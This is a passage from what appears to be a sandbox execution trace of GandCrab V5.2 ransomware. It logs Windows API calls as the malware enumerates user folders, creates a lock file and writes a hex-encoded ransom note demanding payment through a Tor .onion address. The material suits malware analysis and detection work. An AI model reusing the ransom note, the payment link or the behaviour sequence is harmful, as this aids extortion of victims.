68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.193] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.194] CloseHandle (hObject=0x2ac) returned 1 [0091.194] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.194] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.194] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x1f9)) [0091.194] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.194] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.194] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.195] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock") returned 65 [0091.195] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.195] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.195] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\") returned 41 [0091.195] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*" [0091.196] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.196] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.196] CloseHandle (hObject=0x2ac) returned 1 [0091.196] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.196] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0091.196] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0091.196] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures" [0091.196] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\" [0091.196] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.196] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.197] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.197] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.197] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.197] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.197] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.197] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt") returned 65 [0091.197] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.198] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2